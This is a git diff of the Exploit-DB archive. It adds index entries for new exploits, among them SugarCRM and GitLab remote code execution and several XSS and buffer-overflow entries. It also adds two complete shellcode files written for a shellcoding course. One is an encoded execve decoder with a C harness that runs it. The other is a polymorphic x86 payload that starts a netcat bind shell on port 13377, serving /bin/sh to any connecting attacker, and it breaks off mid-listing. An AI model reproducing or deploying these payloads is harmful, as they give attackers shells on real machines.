(Metasploit)",2014-10-15,Metasploit,webapps,linux,,2017-03-23,2017-03-23,1,CVE-2014-3829;CVE-2014-3828,,,,,https://github.com/rapid7/metasploit-framework/blob/3123175ac75c38bec5165e01cda05e3b38287003/modules/exploits/linux/http/centreon_sqli_exec.rb 45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,,2018-08-14,2018-08-14,0,CVE-2018-14912,"Metasploit Framework (MSF)",,,, @@ -11449,6 +11457,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35786,exploits/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",webapps,multiple,80,2015-01-14,2015-01-14,0,OSVDB-116965;OSVDB-116964;OSVDB-116963;OSVDB-116962;OSVDB-116961;OSVDB-116960;OSVDB-116959;CVE-2015-1482;CVE-2015-1481;CVE-2015-1368,,,,, 44220,exploits/multiple/webapps/44220.txt,"antMan < 0.9.1a - Authentication Bypass",2018-03-02,"Joshua Bowser",webapps,multiple,,2018-03-02,2018-03-09,0,CVE-2018-7739,,,,, 50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",2021-09-06,Vulnz,webapps,multiple,,2021-09-06,2021-09-06,0,,,,,http://www.exploit-db.comantminer-monitor-0.5.0.zip, +51193,exploits/multiple/webapps/51193.py,"Apache 2.4.x - Buffer Overflow",2023-04-01,"Sunil Iyengar",webapps,multiple,,2023-04-01,2023-04-01,0,CVE-2021-44790,,,,, 49927,exploits/multiple/webapps/49927.py,"Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution",2021-06-02,"Pepe Berba",webapps,multiple,,2021-06-02,2021-06-02,0,CVE-2020-13927;CVE-2020-11978,,,,, 15710,exploits/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery",2010-12-09,"Anatolia Security",webapps,multiple,,2010-12-09,2010-12-09,1,CVE-2010-3449,,,,,http://www.anatoliasecurity.com/adv/as-adv-2010-001.txt 12689,exploits/multiple/webapps/12689.txt,"Apache Axis2 Administration Console - (Authenticated) Cross-Site Scripting",2010-05-21,"Richard Brain",webapps,multiple,,2010-05-20,2016-12-19,0,OSVDB-64844;CVE-2010-2103,,,,, @@ -11930,6 +11939,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42335,exploits/multiple/webapps/42335.txt,"PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting",2017-07-18,"Daniel Correa",webapps,multiple,,2017-07-18,2017-07-18,0,CVE-2017-11356;CVE-2017-11355,"Cross-Site Scripting (XSS)",,,, 33284,exploits/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2009-10-14,euronymous,webapps,multiple,,2009-10-14,2014-05-10,1,,,,,,https://www.securityfocus.com/bid/36672/info 50097,exploits/multiple/webapps/50097.txt,"perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)",2021-07-06,"Alhasan Abbas",webapps,multiple,,2021-07-06,2021-07-06,0,,,,,, +51186,exploits/multiple/webapps/51186.txt,"perfSONAR v4.4.5 - Partial Blind CSRF",2023-04-01,"Ryan Moore",webapps,multiple,,2023-04-01,2023-04-01,0,CVE-2022-41413,,,,, 49072,exploits/multiple/webapps/49072.txt,"PESCMS TEAM 2.3.2 - Multiple Reflected XSS",2020-11-19,icekam,webapps,multiple,,2020-11-19,2020-11-19,0,CVE-2020-28092,,,,, 46316,exploits/multiple/webapps/46316.txt,"pfSense 2.4.4-p1 - Cross-Site Scripting",2019-02-04,"Ozer Goker",webapps,multiple,,2019-02-04,2019-02-05,0,,"Cross-Site Scripting (XSS)",,,, 47446,exploits/multiple/webapps/47446.php,"PHP 7.1 < 7.3 - 'json serializer' disable_functions Bypass",2019-09-28,mm0r1,webapps,multiple,,2019-10-01,2020-02-14,0,,,,,,https://github.com/mm0r1/exploits/blob/70835936612bceb93b268d1e9f761b84496610ed/php-json-bypass/exploit.php @@ -29872,6 +29882,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 1785,exploits/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - 'OptimisticLock' Command Execution",2006-05-14,rgod,webapps,php,,2006-05-13,2017-11-22,1,OSVDB-25532;CVE-2006-2460,,,,, 24768,exploits/php/webapps/24768.txt,"SugarCRM 1.x/2.0 Module - 'record' SQL Injection",2004-11-23,"GulfTech Security",webapps,php,,2004-11-23,2018-01-05,1,"CVE-2004-1225;OSVDB-12229;BID: 11740;GTSA-00050",,,,,http://gulftech.org/advisories/SugarCRM%20Multiple%20Vulnerabilities/50 24769,exploits/php/webapps/24769.txt,"SugarCRM 1.x/2.0 Module - Traversal Arbitrary File Access",2004-11-23,"GulfTech Security",webapps,php,,2004-11-23,2018-01-05,1,"CVE-2004-1227;OSVDB-12230;BID: 11740;GTSA-00050",,,,,http://gulftech.org/advisories/SugarCRM%20Multiple%20Vulnerabilities/50 +51187,exploits/php/webapps/51187.py,"SugarCRM 12.2.0 - Remote Code Execution (RCE)",2023-04-01,sw33t.0day,webapps,php,,2023-04-01,2023-04-01,0,,,,,, 43683,exploits/php/webapps/43683.txt,"SugarCRM 3.5.1 - Cross-Site Scripting",2018-01-17,"Guilherme Assmann",webapps,php,,2018-01-17,2018-01-17,0,CVE-2018-5715,,,,http://www.exploit-db.comSugarSuite-3.5.1.zip, 8949,exploits/php/webapps/8949.txt,"SugarCRM 5.2.0e - Remote Code Execution",2009-06-15,USH,webapps,php,,2009-06-14,,1,CVE-2009-2146;OSVDB-55089,,,,,http://www.ush.it/team/ush/hack-sugarcrm_520e/adv.txt 35467,exploits/php/webapps/35467.txt,"SugarCRM 6.1.1 - Information Disclosure",2011-03-15,"RedTeam Pentesting GmbH",webapps,php,,2011-03-15,2014-12-05,1,CVE-2011-0745;OSVDB-74888,,,,,https://www.securityfocus.com/bid/46885/info @@ -33598,6 +33609,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 30603,exploits/php/webapps/30603.html,"XCMS 1.1/1.7 - 'Password' Arbitrary PHP Code Execution",2007-09-22,x0kster,webapps,php,,2007-09-22,2013-12-31,1,CVE-2007-5060;OSVDB-40584,,,,,https://www.securityfocus.com/bid/25771/info 4802,exploits/php/webapps/4802.txt,"XCMS 1.82 - Local/Remote File Inclusion",2007-12-28,nexen,webapps,php,,2007-12-27,,1,OSVDB-40276;CVE-2007-6604,,,,, 4813,exploits/php/webapps/4813.txt,"XCMS 1.83 - Remote Command Execution",2007-12-30,x0kster,webapps,php,,2007-12-29,,1,OSVDB-40277;CVE-2007-6652,,,,, +51184,exploits/php/webapps/51184.txt,"XCMS v1.83 - Remote Command Execution (RCE)",2023-04-01,Onurcan,webapps,php,,2023-04-01,2023-04-01,0,,,,,, 27797,exploits/php/webapps/27797.txt,"XDT Pro 2.3 - 'stats.php' Cross-Site Scripting",2006-05-02,almaster,webapps,php,,2006-05-02,2013-08-23,1,,,,,,https://www.securityfocus.com/bid/17781/info 36949,exploits/php/webapps/36949.txt,"Xeams 4.5 Build 5755 - Multiple Vulnerabilities",2015-05-08,"Marlow Tannhauser",webapps,php,5272,2015-05-08,2015-05-08,0,CVE-2015-3141;OSVDB-121847,,,,, 1459,exploits/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution",2006-01-30,cijfer,webapps,php,,2006-01-29,2016-06-21,1,,,,,http://www.exploit-db.comxeCMS-RC2.7z, @@ -33852,6 +33864,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 8066,exploits/php/webapps/8066.txt,"YACS CMS 8.11 - 'update_trailer.php' Remote File Inclusion",2009-02-16,ahmadbady,webapps,php,,2009-02-15,2017-02-13,1,OSVDB-52041,,,,, 44424,exploits/php/webapps/44424.txt,"Yahei PHP Prober 0.4.7 - Cross-Site Scripting",2018-04-09,ManhNho,webapps,php,,2018-04-09,2018-04-09,0,CVE-2018-9238,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comtz_e.zip, 7131,exploits/php/webapps/7131.txt,"yahoo answers - 'id' SQL Injection",2008-11-16,snakespc,webapps,php,,2008-11-15,2017-01-02,1,OSVDB-49906;CVE-2008-5490,,,,, +51198,exploits/php/webapps/51198.txt,"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)",2023-04-01,"SITE Team",webapps,php,,2023-04-01,2023-04-01,0,CVE-2022-48197,,,,, 13845,exploits/php/webapps/13845.txt,"Yamamah - 'news' SQL Injection / Source Code Disclosure",2010-06-12,anT!-Tr0J4n,webapps,php,,2010-06-11,2016-10-27,0,CVE-2010-2336;CVE-2010-2335;CVE-2010-2334;CVE-2010-1300;OSVDB-65648;OSVDB-65479;OSVDB-63344,,,,http://www.exploit-db.comyamamah_v1.rar, 13849,exploits/php/webapps/13849.txt,"Yamamah 1.0 - SQL Injection",2010-06-12,TheMaStEr,webapps,php,,2010-06-11,,1,CVE-2010-1300,,,,http://www.exploit-db.comyamamah_v1.rar, 11947,exploits/php/webapps/11947.txt,"Yamamah 1.00 - Multiple Vulnerabilities",2010-03-30,indoushka,webapps,php,,2010-03-29,,0,OSVDB-63344;CVE-2010-2335;CVE-2010-1300,,,,http://www.exploit-db.comyamamah_v1.rar, @@ -34274,6 +34287,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50889,exploits/ruby/webapps/50889.txt,"GitLab 14.9 - Stored Cross-Site Scripting (XSS)",2022-04-26,Greenwolf,webapps,ruby,,2022-04-26,2022-05-11,0,CVE-2022-1175,,,,, 49822,exploits/ruby/webapps/49822.txt,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby,,2021-05-03,2021-06-07,0,,,,,, 49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby,,2021-05-03,2021-06-07,0,,,,,, +51181,exploits/ruby/webapps/51181.py,"GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)",2023-04-01,"Antonio Francesco Sardella",webapps,ruby,,2023-04-01,2023-04-01,0,CVE-2022-2884,,,,, 42961,exploits/ruby/webapps/42961.txt,"Metasploit Web UI < 4.14.1-20170828 - Cross-Site Request Forgery",2017-08-30,"Dhiraj Mishra",webapps,ruby,,2017-10-08,2020-08-22,1,CVE-2017-15084,,,,, 39730,exploits/ruby/webapps/39730.txt,"NationBuilder - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-04-25,LiquidWorm,webapps,ruby,443,2016-04-25,2016-04-25,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5318.php 39997,exploits/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-06-21,"David Silveiro",webapps,ruby,80,2016-06-21,2016-06-21,0,,,,,http://www.exploit-db.comradiant-1.1.3.tar.gz, @@ -35065,6 +35079,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28232,exploits/windows/dos/28232.txt,"Agnitum Outpost Firewall 3.5.631 - 'FiltNT.SYS' Local Denial of Service",2006-07-17,"Bipin Gautam",dos,windows,,2006-07-17,2013-09-12,1,CVE-2006-3696;OSVDB-27353,,,,,https://www.securityfocus.com/bid/19026/info 11260,exploits/windows/dos/11260.py,"AIC Audio Player 1.4.1.587 - Local Crash (PoC)",2010-01-26,b0telh0,dos,windows,,2010-01-25,,1,,,,,http://www.exploit-db.comSetup_AICAudioPlayer.exe, 3034,exploits/windows/dos/3034.py,"AIDeX Mini-WebServer 1.1 - Remote Crash (Denial of Service)",2006-12-28,shinnai,dos,windows,,2006-12-27,,1,OSVDB-32537;CVE-2006-6855,,,,, +51196,exploits/windows/dos/51196.txt,"AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)",2023-04-01,nu11secur1ty,dos,windows,,2023-04-01,2023-04-01,0,,,,,, 8837,exploits/windows/dos/8837.txt,"AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow (PoC) (SEH)",2009-06-01,LiquidWorm,dos,windows,,2009-05-31,,1,OSVDB-54812;CVE-2009-1944,,2009-aimp2_evil.mp3,,, 33640,exploits/windows/dos/33640.py,"AIMP 2.8.3 - '.m3u' Remote Stack Buffer Overflow",2010-02-12,Molotov,dos,windows,,2010-02-12,2014-06-04,1,,,,,,https://www.securityfocus.com/bid/38215/info 9561,exploits/windows/dos/9561.py,"AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)",2009-09-01,mr_me,dos,windows,,2009-08-31,,1,OSVDB-58125;CVE-2009-3170,,,,http://www.exploit-db.comaimp_2.51.330.zip, @@ -40541,6 +40556,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 40539,exploits/windows/local/40539.txt,"NETGATE Registry Cleaner 16.0.205 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows,,2016-10-17,2016-10-19,1,,,,,http://www.exploit-db.comrc-setup.exe, 40442,exploits/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,local,windows,,2016-09-30,2016-10-03,0,,,,,http://www.exploit-db.comNETGEARGenie-install.exe, 50443,exploits/windows/local/50443.txt,"Netgear Genie 2.4.64 - Unquoted Service Path",2021-10-25,"Mert Daş",local,windows,,2021-10-25,2021-10-25,0,,,,,, +51199,exploits/windows/local/51199.c,"NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit",2023-04-01,"Neil Kettle",local,windows,,2023-04-01,2023-04-01,0,,,,,, 17223,exploits/windows/local/17223.pl,"NetOp Remote Control 8.0/9.1/9.2/9.5 - Local Buffer Overflow",2011-04-28,chap0,local,windows,,2011-04-28,2011-04-29,1,OSVDB-72291,,,,, 48680,exploits/windows/local/48680.py,"NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter)",2020-07-22,"Saeed reza Zamanian",local,windows,,2020-07-22,2020-07-22,0,,,,,, 46530,exploits/windows/local/46530.py,"NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)",2019-03-11,"Devin Casadey",local,windows,,2019-03-11,2019-03-11,0,,,,,http://www.exploit-db.comnetsetman_setup_471.exe, @@ -40953,6 +40969,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49679,exploits/windows/local/49679.txt,"SOYAL 701 Client 9.0.1 - Insecure Permissions",2021-03-19,LiquidWorm,local,windows,,2021-03-19,2021-03-19,0,,,,,, 49678,exploits/windows/local/49678.txt,"SOYAL 701 Server 9.0.1 - Insecure Permissions",2021-03-19,LiquidWorm,local,windows,,2021-03-19,2021-03-19,0,,,,,, 30681,exploits/windows/local/30681.txt,"SpeedFan - 'Speedfan.sys' Local Privilege Escalation",2007-10-18,"Ruben Santamarta",local,windows,,2007-10-18,2014-01-06,1,CVE-2007-5633;OSVDB-41842,,,,,https://www.securityfocus.com/bid/26123/info +51182,exploits/windows/local/51182.txt,"Splashtop 8.71.12001.0 - Unquoted Service Path",2023-04-01,"A.I. hernandez",local,windows,,2023-04-01,2023-04-01,0,,,,,, 45071,exploits/windows/local/45071.py,"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)",2018-07-23,bzyo,local,windows,,2018-07-23,2018-07-23,0,,,,,http://www.exploit-db.comssproeval512.exe, 45072,exploits/windows/local/45072.txt,"Splinterware System Scheduler Pro 5.12 - Privilege Escalation",2018-07-23,bzyo,local,windows,,2018-07-23,2018-08-08,1,,,,,http://www.exploit-db.comssproeval512.exe, 17306,exploits/windows/local/17306.pl,"SpongeBob SquarePants Typing - Local Buffer Overflow (SEH)",2011-05-18,"Infant Overflow",local,windows,,2011-05-18,2011-05-18,1,,,,http://www.exploit-db.com/screenshots/idlt17500/untitled.png,, @@ -45209,6 +45226,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44905,exploits/windows/webapps/44905.txt,"Redatam Web Server < 7 - Directory Traversal",2018-06-18,"Berk Dusunur",webapps,windows,,2018-06-18,2018-06-19,0,,Traversal,,,, 34852,exploits/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",webapps,windows,80,2014-10-02,2014-10-02,0,CVE-2014-7226;OSVDB-112626,,,,http://www.exploit-db.comhfs2.3c.src.zip, 49125,exploits/windows/webapps/49125.py,"Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)",2020-11-30,"Óscar Andreu",webapps,windows,,2020-11-30,2020-11-30,0,CVE-2014-6287,,,,, +51188,exploits/windows/webapps/51188.txt,"Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)",2023-04-01,"Mohammed A.Siledar",webapps,windows,,2023-04-01,2023-04-01,0,CVE-2022-30519,,,,, 44626,exploits/windows/webapps/44626.txt,"Rockwell Scada System 27.011 - Cross-Site Scripting",2018-05-16,t4rkd3vilz,webapps,windows,,2018-05-16,2018-05-16,0,CVE-2016-2279,,,,, 33428,exploits/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 < 7.4 / Sentinel Keys Server 1.0.3 < 1.0.4 - Directory Traversal",2014-05-19,"Matt Schmidt",webapps,windows,7002,2014-05-19,2014-05-27,1,CVE-2007-6483;OSVDB-42402,,,http://www.exploit-db.com/screenshots/idlt33500/screen-shot-2014-05-27-at-91059-am.png,http://www.exploit-db.comSentinel_Protection_Installer_7.4.0.exe, 16054,exploits/windows/webapps/16054.txt,"sap crystal report server 2008 - Directory Traversal",2011-01-26,"Dmitriy Chastuhin",webapps,windows,,2011-01-26,2011-01-26,0,,,,,, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 06b6c2313..168aa40cc 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -180,6 +180,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd 43509,shellcodes/irix/43509.c,"IRIX - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,anonymous,,irix,,2018-01-11,2018-01-11,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-141.php 43511,shellcodes/irix/43511.c,"IRIX - execve(/bin/sh) Shellcode (68 bytes)",2009-01-01,scut/teso,,irix,68,2018-01-11,2018-01-11,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-140.php 43512,shellcodes/irix/43512.c,"IRIX - stdin-read Shellcode (40 bytes)",2009-01-01,scut/teso,,irix,40,2018-01-11,2018-01-11,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-137.php +51191,shellcodes/linux/51191.txt,"FlipRotation v1.0 decoder - Shellcode (146 bytes)",2023-04-01,"Eduardo Silva",,linux,146,2023-04-01,2023-04-01,0,,,,,, 41375,shellcodes/linux/41375.c,"Linux - Bind (/TCP) Shell + Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,,linux,156,2017-02-16,2017-07-11,0,,,,,, 41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,,linux,37,2017-01-29,2017-07-11,0,,,,,, 14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,,linux,62,2010-07-05,2010-07-05,1,,,,,, @@ -569,6 +570,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd 46791,shellcodes/linux_x86/46791.c,"Linux/x86 - OpenSSL Encrypt (aes256cbc) Files (test.txt) Shellcode (185 bytes)",2019-05-03,strider,,linux_x86,185,2019-05-03,2019-05-23,0,,,,,, 13563,shellcodes/linux_x86/13563.asm,"Linux/x86 - Overwrite MBR On /dev/sda With _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,,linux_x86,43,2010-01-14,2018-01-09,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-565.php 13323,shellcodes/linux_x86/13323.c,"Linux/x86 - Perl Script Execution Shellcode (99+ bytes)",2009-03-03,darkjoker,,linux_x86,99,2009-03-02,2017-07-11,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-74.php +51189,shellcodes/linux_x86/51189.txt,"Linux/x86 - Polymorphic linux x86 Shellcode (92 Bytes)",2023-04-01,"Eduardo Silva",,linux_x86,92,2023-04-01,2023-04-01,0,,,,,, 13332,shellcodes/linux_x86/13332.c,"Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)",2008-11-18,XenoMuta,,linux_x86,56,2008-11-17,2017-08-23,1,,,"Ho\' Detector",,, 13715,shellcodes/linux_x86/13715.c,"Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,,linux_x86,83,2010-05-26,2018-01-17,1,,,,,, 43684,shellcodes/linux_x86/43684.c,"Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (89 bytes)",2009-01-01,agix,,linux_x86,89,2018-01-17,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-610.php @@ -831,6 +833,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd 46397,shellcodes/macos/46397.c,"Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",,macos,31,2019-02-18,2019-05-23,0,,,,,, 46395,shellcodes/macos/46395.c,"Apple macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2019-02-18,"Ken Kitahara",,macos,103,2019-02-18,2019-02-18,0,,,,,, 46393,shellcodes/macos/46393.c,"Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (119 bytes)",2019-02-18,"Ken Kitahara",,macos,119,2019-02-18,2019-05-23,0,,,,,, +51178,shellcodes/macos/51178.txt,"macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode",2023-04-01,boku,,macos,286,2023-04-01,2023-04-01,0,,,,,, 51177,shellcodes/macos/51177.txt,"macOS/x64 - Execve Null-Free Shellcode",2023-03-31,boku,,macos,253,2023-03-31,2023-03-31,0,,,,,, 39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows (x86/x64) - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Shellcode (194 bytes) (Generator)",2016-06-06,odzhancode,,multiple,194,2016-06-16,2018-01-21,1,,,,http://www.exploit-db.com/screenshots/idlt40000/screen-shot-2016-06-16-at-80737-am.png,, 13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)",2004-09-12,dymitri,,multiple,38,2004-09-11,,1,,,,,, diff --git a/shellcodes/linux/51191.txt b/shellcodes/linux/51191.txt new file mode 100644 index 000000000..49fcf36c2 --- /dev/null +++ b/shellcodes/linux/51191.txt @@ -0,0 +1,106 @@ +## Exploit Title: FlipRotation v1.0 decoder - Shellcode (146 bytes) +## Exploit Author: Eduardo Silva +## Date: 2022-12-31 +## Tested on: Linux x86_64 SMP Debian 4.19.260-1 +## SLAE/Student ID: PA-31319 +## Webpage: https://0xnibbles.github.io/ +## Twitter: @0xnibbles +## Course: This shellcode was created for the x86 Assembly Language and Shellcoding on Linux (SLAE32) Course offered at pentesteracademy.com. +## Description: The inspiration for this algorithm was the known CBC bit-flipping attack but applying a simple variation to our context. +## +## More specifically, the steps are +## +## 1 - We pick each shelcode byte and flip the last bit using a xor operation - flipped_shellbyte = shellbyte ^ 0x01 +## 2 - Based on that output the rotation direction is defined. We rotate right if odd or left if even. The number of rotation positions is defined by the loop index value (number of interations) of the loop at that time. +## 3 - If we rotate right we append 0x2 afther the encoded byte and if we rotate left we append 0xff +## 4 - Put the byte 0xa0 as the shellcode end marker +## +## More info at https://0xnibbles.github.io/posts/slae_32_assignment_4/ - the 64 bit version has the same logic as 32 bit +## +## Example: +## $ ./shellcode +## Shellcode Length: 146 +## id +## uid=1000 ... +## +######################################################################## + +global _start + +section .text +_start: + + jmp decoder + EncodedShellcode: db 0x49,0xff,0x18,0x02,0x7,0xff,0x8a,0xff,0x94,0xff,0xd5,0x02,0xb8,0x02,0xb1,0xff,0x68,0x02,0xde,0xff,0x8b,0x02,0xc5,0x02,0x27,0x02,0x2d,0xff,0x49,0x02,0xa4,0xff,0x88,0x02,0x73,0x02,0x45,0xff,0x4a,0xff,0x88,0x02,0x7c,0xff,0x59,0x02,0xa4,0xff,0x88,0x02,0xcf,0xff,0x25,0xff,0x50,0x02,0x1c,0xff,0xd1,0x02,0x38,0x02,0x8,0x02,0xa0,0xa0 ; 0xa0 is the stop marker + +decoder: + + lea rsi, [rel EncodedShellcode] + lea rdi, [rsi+1] ; pointing to second byte (0x02) from shellcode + xor rax, rax + mul rax ; zeroes edx + mov al, 1 + xor rcx, rcx + xor rbx, rbx + + +decode: + mov bl, byte [rsi + rax] ; mov parity byte to bl + xor bl, 0xa0 ; check if reached the end marker | 0xa0 ^ 0xff = 0x5f + jz short EncodedShellcode ; reached the marker if Zero Flag not set + + xor bl, 0x5f ; if equal parity is even (0xff) + mov bl, byte [rsi + rdx] + jnz odd + +even: ; rotate right + + ror bl, cl + jmp short bitFlip + +odd: ; rotate left + + rol bl, cl + +bitFlip: + + xor bl, 0x01 + +restore_next_byte: + + mov byte [rsi + rdx], bl ; replaces the original byte + mov bl, byte [rsi + rax+1] ; mov next shellbyte + mov byte [rdi], bl + inc rdi + add al, 2 + inc dl + inc cl + + ; Doing circular array as modulo workaround. Use 0x08 as a divisor or circular boundary because we are rotating 8 bits (al register). + + cmp cl, 0x08 ; if equal ZF will be set meaning we have a complete rotation + jnz decode ; $+2 ; jump if rotation is not complete + xor rcx, rcx ; if rotation is complete and reset cl to start again the "circular array" + + jmp short decode + +############################################## + +// Filename: shellcode.c +// Compile: gcc -z execstack -fno-stack-protector shellcode.c -o shellcode + +#include +#include + +unsigned char code[] = \ +"\xeb\x42\x49\xff\x18\x02\x07\xff\x8a\xff\x94\xff\xd5\x02\xb8\x02\xb1\xff\x68\x02\xde\xff\x8b\x02\xc5\x02\x27\x02\x2d\xff\x49\x02\xa4\xff\x88\x02\x73\x02\x45\xff\x4a\xff\x88\x02\x7c\xff\x59\x02\xa4\xff\x88\x02\xcf\xff\x25\xff\x50\x02\x1c\xff\xd1\x02\x38\x02\x08\x02\xa0\xa0\x48\x8d\x35\xb7\xff\xff\xff\x48\x8d\x7e\x01\x48\x31\xc0\x48\xf7\xe0\xb0\x01\x48\x31\xc9\x48\x31\xdb\x8a\x1c\x06\x80\xf3\xa0\x74\x9d\x80\xf3\x5f\x8a\x1c\x16\x75\x04\xd2\xcb\xeb\x02\xd2\xc3\x80\xf3\x01\x88\x1c\x16\x8a\x5c\x06\x01\x88\x1f\x48\xff\xc7\x04\x02\xfe\xc2\xfe\xc1\x80\xf9\x08\x75\xd0\x48\x31\xc9\xeb\xcb"; + + +main() { + + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file diff --git a/shellcodes/linux_x86/51189.txt b/shellcodes/linux_x86/51189.txt new file mode 100644 index 000000000..22c2ca232 --- /dev/null +++ b/shellcodes/linux_x86/51189.txt @@ -0,0 +1,127 @@ +# Exploit Title: Polymorphic linux x86 nc -lvve/bin/sh -p13377 shellcode (92 Bytes) +# Exploit Author: Eduardo Silva +# Date: 2022-12-28 +# Tested on: Linux x86_64 SMP Debian 4.19.260-1 +# SLAE/Student ID: PA-31319 +# Webpage: https://0xnibbles.github.io/ + +# Description: This shellcode is a polymorphic version of http://www.shell-storm.org/shellcode/files/shellcode-804.html. +# Shellcode is converted to raw opcodes and splitted in various "pieces" and those are decoded in runtime. Each "piece" of code is a preparation to nc arguments. +# To determine the end of each "piece" of opcodes that represent shellcode a nop (0x90) is used instead of a null bytes. the nop is decoded in runtime. +# The instruction - lea $Register, [esi+4] -determines which argument is being set up +# It leverages the x87 FPU instructions fnop and fnstenv to store EIP onto the stack and jump for the relative address in runtime. This used to avoid using call to perform relative jump as this introduces null bytes. +# For example, the relatiev call instruction - call $ + 0x12 ;\xe8\x0d\x00\x00\x00 - results in null bytes being added. USing fnstenv avoids this situation +# +# Example: +# $ ./shellcode +# Shellcode Length: 92 +# listening on [any] 13377 +# +# [...] +# $ nc 127.0.0.1 13377 +# id +# uid=1000 ... +# +#################################### + + +;Polymorphic linux x86 nc -lvve/bin/sh -p13377 shellcode +;This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker + +global _start + +section .text +_start: + +xor eax,eax + +mov al, 0x8 +fnop +jmp short argParser ;fnstenv will make x87 FPU store this address + ; the argParser stub adds 4 bytes to the stored and redirect execution to the next isntruction + +sub eax,0x33317076 +xor esi,DWORD [edi] +aaa +nop + +lea edx, [esi+4] + +mov al, 0xc +fnop +jmp short argParser + +sub eax,0x6576766c ; \xe8\x0e\x00\x00\x00 +das +bound ebp, [ecx+0x6e] +das +jae $+0x6a +nop + + +lea ecx, [esi+4] + +;call $ + 0x12 ;\xe8\x0d\x00\x00\x00 --> example of how a call introduces null bytes + +mov al, 0xc +fnop +jmp short argParser + +das +bound ebp, [ecx+0x6e] +das +das +das +das +das +das +outsb +arpl word [eax],bx + +lea ebx, [esi+4] + +push eax +push edx +push ecx +push ebx + + + +cdq +mov ecx,esp +mov al, 0xb +int 0x80 + +argParser: ; similar to jmp-call-pop but calls to a nop byte + ; assuming al has the right distance + fnstenv [esp-0xc] + ;pop 